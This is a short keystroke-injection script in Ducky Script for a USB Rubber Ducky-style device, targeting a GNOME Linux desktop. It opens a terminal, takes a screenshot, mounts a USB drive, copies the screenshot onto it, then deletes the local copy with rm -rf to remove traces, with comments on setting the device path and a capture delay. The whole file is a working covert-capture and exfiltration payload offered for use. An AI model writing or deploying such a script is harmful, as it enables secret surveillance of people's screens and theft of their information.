DELAY 1000
ALT F2
DELAY 100
STRING gnome-terminal
DELAY 200
ENTER
DELAY 300
STRING gnome-screenshot
DELAY 200
ENTER
DELAY 200
STRING mv ~/Pictures/Screenshot*.png ~/
DELAY 200
ENTER
DELAY 500
STRING mount [path to usb] /mnt
DELAY 500
ENTER
DELAY 500
STRING cp Screenshot*.png /mnt
DELAY 500
ENTER
DELAY 500
STRING umount /mnt
DELAY 500
ENTER
DELAY 500
STRING sync
DELAY 500
ENTER
DELAY 500
STRING rm -rf Screenshot*.png
DELAY 500
ENTER
DELAY 500
STRING exit
DELAY 200
ENTER

REM example: /dev/sdb1

REM ---to delay screen shot by x seconds change line 8 with----
REM ---STRING gnome-screenshot -d 10--------
